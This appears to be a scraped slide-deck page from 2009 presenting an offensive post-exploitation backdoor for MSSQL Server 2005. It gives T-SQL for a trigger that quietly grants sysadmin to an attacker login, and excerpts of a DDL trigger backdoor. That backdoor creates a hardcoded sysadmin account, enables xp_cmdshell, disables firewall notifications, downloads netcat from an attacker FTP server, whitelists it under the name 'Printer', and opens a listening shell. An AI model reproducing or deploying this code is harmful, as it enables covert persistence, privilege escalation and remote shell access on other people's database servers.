140 likes | 333 Views
Duong Ngo October 14, 2009. MSSql server 2005 backdoor. POST-EXPLOITATION. Got access to a MSSQL box? (SQL injection, brute force…) Privileges: sa / dbo / normal user Got all data Now what’s next??. Backdoors. Provide easier access to the compromised box in the future
E N D
Duong Ngo October 14, 2009 MSSql server 2005 backdoor
POST-EXPLOITATION • Got access to a MSSQL box? (SQL injection, brute force…) • Privileges: sa / dbo / normal user • Got all data • Now what’s next??
Backdoors • Provide easier access to the compromised box in the future • Type of backdoors: OS backdoors (rootkits), Web server backdoor ( PHPshell, CGITelnet..) • So how’s about Database Backdoor?? YES!
SQL Server 2005 Backdoor • We’ll create a backdoor based on SQLServer Trigger. • What’s Trigger?
Database Trigger • Special kind of stored procedure that executes automatically when a user attempts the specified data-modification statement on the specified table (UPDATE, DELETE, INSERT..) • Trigger gets executed under the security context of whocaused trigger to fire!
EXAMPLE – Create trigger Context: Normal User with Create Trigger permission: CREATE TRIGGER trg_gain_ privilege ON tblCustomers FOR INSERT, DELETE,UPDATE AS EXEC sp_addsrvrolemember @loginame ='Hacker', @rolename = N'sysadmin‘
EXAMPLE – Trigger got fired • Context: sa (server admin) sa> DELETE * FROM tblCustomers • RESULT?? User: “Hacker” now become sysadmin
What can we do with that? • Privilege escalation: normal user -> higher role • Database backdoor
SQLServer Backdoor features: • - Execute subsequent commands if current user is 'sa‘ • - Enable xp_cmdshell • - Create new login 'backdoor' and add it to sysadmin server role. • - Disable firewall notification mode • - Add ftp to allowed programs list • - Get netcat from attacker ftp server • - Create a directory 'Backdoor_activated' in attacker ftp server to let attacker knows whenever the backdoor has been started. • - Open netcat in listen mode attached with sql command line client Osql.
Our Backdoor’s Code CREATE TRIGGER trg_backdoor ON DATABASE FOR DDL_DATABASE_LEVEL_EVENTS AS BEGIN DECLARE @cur_uservarchar(200) …… CREATE LOGIN [backdoor] WITH PASSWORD = 'Backdoor123#' ; EXEC sys.sp_addsrvrolemember @loginame = N'Backdoor', @rolename =N'sysadmin' --disable firewall notification mode Exec master..xp_cmdshell 'netsh firewall set notifications disable‘ …..
Why DL_DATABASE_LEVEL_EVENTS Because it consists of all below events: CREATE_TABLE ALTER_TABLE DROP_TABLE CREATE_VIEW ALTER_VIEW DROP_VIEW CREATE_SYNONYM DROP_SYNONYM CREATE_FUNCTION ALTER_FUNCTION DROP_FUNCTION CREATE_PROCEDURE ALTER_PROCEDURE DROP_PROCEDURE CREATE_TRIGGER ALTER_TRIGGER DROP_TRIGGER CREATE_EVENT_NOTIFICATION DROP_EVENT_NOTIFICATION …. ….
Our Backdoor’s Code (cont) -- save ftp commands to an external file SET @cmd = 'echo GET ' + @fileget + ' >> ' + @cmdfile ….. -- execute ftp with commands loaded from the file we created SET @cmd = 'ftp -s:' + @cmdfile EXEC master..xp_cmdshell @cmd, NO_OUTPUT …… -- After get netcat, add netcat to firewall’s allowedprogram list SET @cmd = 'netsh firewall add allowedprogram program=' + @localdir + '\'+ @fileget + ' name=Printer mode=ENABLE scope=ALL profile=ALL'